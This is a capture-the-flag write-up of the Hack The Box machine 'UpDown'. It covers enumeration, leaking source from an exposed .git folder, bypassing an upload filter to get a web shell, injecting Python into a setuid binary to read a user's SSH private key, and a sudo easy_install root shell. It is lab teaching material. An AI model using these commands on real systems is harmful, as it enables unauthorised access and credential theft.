CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Nmap
  • Port 80
  • subdomain enum wfuzz
  • Gobuster
  • Look around
  • Becoming developer
  • Privesc
  1. Writeups
  2. Hackthebox Writeups

Hackthebox - Updown

PreviousHackthebox - VaultNextTryHackme Writeups

Last updated 2 years ago

  • Linux

Nmap

┌──(kali㉿kali)-[~/Documents/hackthebox/updown]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.11.177                                                                                                        
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-05 15:15 EST
Nmap scan report for 10.10.11.177
Host is up (0.025s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e1f98d7c8ba61dbf149669d701702e7 (RSA)
|   256 c21cfe1152e3d7e5f759186b68453f62 (ECDSA)
|_  256 5f6e12670a66e8e2b761bec4143ad38e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/5%OT=22%CT=1%CU=31935%PV=Y%DS=2%DC=I%G=Y%TM=63B73002
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST11
OS:NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.93 seconds

Port 80

  • When we go to http://10.10.11.177/ we land here

  • Seems like we'll have some fun ^^

  • Let's add this in /etc/hosts first 10.10.11.177 siteisup.htb

subdomain enum wfuzz

┌──(kali㉿kali)-[~]
└─$ wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u 'http://siteisup.htb/' -H "HOST: FUZZ.siteisup.htb" --hc 200
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://siteisup.htb/
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                     
=====================================================================

000000022:   403        9 L      28 W       281 Ch      "dev - dev"                                                                                                                                                                 
000037212:   400        10 L     35 W       301 Ch      "* - *"                                                                                                                                                                     

Total time: 347.2654
Processed Requests: 100000
Filtered Requests: 99998
Requests/sec.: 287.9641
  • Let's add the subdomain in our hosts we get a 403 here

Gobuster

┌──(kali㉿kali)-[~/Documents/hackthebox/updown]
└─$ gobuster dir -u http://siteisup.htb/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://siteisup.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/05 15:21:42 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/dev                  (Status: 301) [Size: 310] [--> http://siteisup.htb/dev/]
/server-status        (Status: 403) [Size: 277]
Progress: 20425 / 20476 (99.75%)===============================================================
2023/01/05 15:22:46 Finished
===============================================================
  • /dev is a blank page. Let's try to run gobuster in it

┌──(kali㉿kali)-[~/Documents/hackthebox/updown]
└─$ gobuster dir -u http://siteisup.htb/dev -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://siteisup.htb/dev
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/05 16:09:09 Starting gobuster in directory enumeration mode
===============================================================
/.git                 (Status: 301) [Size: 315] [--> http://siteisup.htb/dev/.git/]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
Progress: 20369 / 20476 (99.48%)===============================================================
2023/01/05 16:10:14 Finished
===============================================================
  • Let's also try to dir bust the subdomain dev. So not possible because of the status code

Look around

  • Ok now let's do what I was tempted to do since I saw the landig page

  • python3 -m http.server 80

  • In the browser let's try to see if we can interact this way and enter http://10.10.14.10/test in the form

  • So we should try to get files or inject command or see what open port we have using this technique

  • We can fuzz for open ports with burp intruder

  • In the payloads tab we choose number. And start from 1 to 65535 with a step of 1.

If you do not have the pro version of burp the best way would be to use another tool because community version might be slow for this.

  • Let's see our results. So it was worth trying but besides port 80 we do not have anything

  • wget -r http://siteisup.htb/dev/.git/

  • then we can use git diff go in the dev directory and run git diff > diff.txt this way you can look and grep and really analyze the file

  • Other interesting commands are the git log we will have the commit history and git show <commit-id> to have more info on a specific commit

  • This commit is really interesting

┌──(kali㉿kali)-[~/…/updown/gitfolder/siteisup.htb/dev]
└─$ git show bc4ba79e596e9fd98f1b2837b9bd3548d04fe7ab                                                                                                                                                                                    1 ⚙
commit bc4ba79e596e9fd98f1b2837b9bd3548d04fe7ab
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date:   Wed Oct 20 16:37:20 2021 +0200

    Update .htaccess
    
    New technique in header to protect our dev vhost.

diff --git a/.htaccess b/.htaccess
index 3190432..44ff240 100644
--- a/.htaccess
+++ b/.htaccess
@@ -1,5 +1,4 @@
-AuthType Basic
-AuthUserFile /var/www/dev/.htpasswd
-AuthName "Remote Access Denied"
-Require ip 127.0.0.1 ::1
-Require valid-user
+SetEnvIfNoCase Special-Dev "only4dev" Required-Header
+Order Deny,Allow
+Deny from All
+Allow from env=Required-Header
  • With this commit we know that in order to access the .htpasswd we need this header in the request Special-Dev: only4dev and our Ip should be 127.0.0.1. We alse need a valid pair of credentials

  • This one is also interesting

┌──(kali㉿kali)-[~/…/updown/gitfolder/siteisup.htb/dev]
└─$ git show 6ddcc7a8ac393edb7764788c0cbc13a7a521d372                                                                                                                                                                                    1 ⚙
commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date:   Wed Oct 20 15:04:38 2021 +0200

    Create .htaccess

diff --git a/.htaccess b/.htaccess
new file mode 100644
index 0000000..3190432
--- /dev/null
+++ b/.htaccess
@@ -0,0 +1,5 @@
+AuthType Basic
+AuthUserFile /var/www/dev/.htpasswd
+AuthName "Remote Access Denied"
+Require ip 127.0.0.1 ::1
+Require valid-user
  • Let's try to add the new header everywhere and see what we get

  • So here is what it looks like in my Burp

  • So let's try to navigate to http://dev.siteisup.htb/

  • We have access to a new page, with a file upload functionality

  • The admin panel link and the changelog do not give anything

  • I tried a php file and it is doing some checks.

  • Maybe there is a way to have a look at the code using the git we found. This way we can see how to bypass this restriction.

  • Ok let's try the tool git dumper mentioned in hacktricks

    • python3 -m venv git-dumper I prefer to install it in a venv so that I do not mess up my local python

    • source git-dumper/bin/activate we activate the env

    • pip install git-dumper we install in in the env

    • git-dumper http://siteisup.htb/dev/.git/ dumpedsite

    • So now we can see some php file. the index is not where the extension is verified but the checker seems interesting. This function is the one that is of interest for us

if($_POST['check']){
  
 # File size must be less than 10kb.
 if ($_FILES['file']['size'] > 10000) {
        die("File too large!");
  }
 $file = $_FILES['file']['name'];

 # Check if extension is allowed.
 $ext = getExtension($file);
 if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
  die("Extension not allowed!");
 }

 # Create directory to upload our file.
 $dir = "uploads/".md5(time())."/";
 if(!is_dir($dir)){
    mkdir($dir, 0770, true);
 }
  
  # Upload the file.
 $final_path = $dir.$file;
 move_uploaded_file($_FILES['file']['tmp_name'], "{$final_path}");
 
  # Read the uploaded file.
 $websites = explode("\n",file_get_contents($final_path));
 
 foreach($websites as $site){
  $site=trim($site);
  if(!preg_match("#file://#i",$site) && !preg_match("#data://#i",$site) && !preg_match("#ftp://#i",$site)){
   $check=isitup($site);
   if($check){
   echo "<center>{$site}<br><font color='green'>is up ^_^</font></center>";
   }else{
    echo "<center>{$site}<br><font color='red'>seems to be down :(</font></center>";
   }
  }else{
  echo "<center><font color='red'>Hacking attempt was detected !</font></center>";
  }
 }

  # Delete the uploaded file.
 @unlink($final_path);
}
  • Very convenient once our file is uploaded we will even know where to fetch it (http://dev.siteisup.htb/uploads/). However it will also delete the file so we have to be quick.

  • It mentions phtm which is not in the list. Let's try it. We can upload it.

  • The best way I can think of to gain time is to put a big url list in the file and add our payload at the end of this list

  • Also be careful to put too many url at the begining because the file limit is 10kb

  • phtm does not get interpreted let's try another one in hacktricks there is also .phar. Let's try it

  • It seems like what is failing me is not the extention but the php file I am using.

  • Let's try another php shell. We get a shell as www-data

Becoming developer

  • We need to move to the user developer (we know the user is called developer with ls /home) because we can not read the user flag now.

  • Let's upgrade the shell first python3 -c 'import pty;pty.spawn("/bin/bash")'

  • Here is the full process

python3 -c 'import pty;pty.spawn("/bin/bash")'
// Background our nc / rlwrap nc connection
Ctrl - z 
// Enable standard terminal commands
stty raw -echo;fg
//Reset the shell so we can configure it with our current settings
reset
//Enter the terminal info we noted earlier
Terminal type?
xterm-256color
stty rows 39 columns 190
  • In the developer home we can not cat the user we do have access to the python file that processes the websites to see if they are up

  • If we make a file on siteisup here is what we have

file siteisup
siteisup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b5bbc1de286529f5291b48db8202eefbafc92c1f, for GNU/Linux 3.2.0, not strippe
  • It has the suid bit set. If we launch it we have a prompt to put an url

  • Let's try this __import__('os').system('cat /home/developer/.ssh/id_rsa') id_rsa is the default name for a private ssh key let's hope it will work in our case.

  • We get the private key!!

  • So now we just need to copy it and paste it in our machine, then we will just have to change the rights and ssh -i as developer. Let's try this!

  • It works

  • We can grab the user flag

Privesc

  • First thing I usually do in linux when I have a user is sudo -l and here we get this interesting output:

  • Let's try this

  • TF=$(mktemp -d)

  • echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

  • sudo easy_install $TF

  • It works

  • We can get the root flag!

And it works our server get an interaction from the target

Ok what happens if we request for something that exist like if I just ask for http://10.10.14.10/ or http://127.0.0.1:80/

We send our request to the intruder we postiton our payload in the port number like this

Let's grep is up. so in options grep match we delete the table and add our string

Let's check the git folder we found

is interesting to see how we could process with this

It is worth having a look at the git to see useful git commands

To do so in this article is really helpful

php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i here are the file not allowed. has nice information on how to bypass these protections

This is launch as the user developer so this how we could move to this user. We could try to inject code and get files. When enumering the home of developer there was an ssh folder that we had a permission denied on. We could try to get an ssh key from here. explains how to execute os commands in python.

With some research we find out that easy_install is deprecated. And we can find it on the one and only

This article on Hacktricks
documentation
burpsuite
This article on hacktricks
This article
GTFOBINS
Box on HTB
HTB UpDown
Landing
numbers
burp
file upload
shell
dev
private key
developer
easy install
root
request sent
up
port
grep
git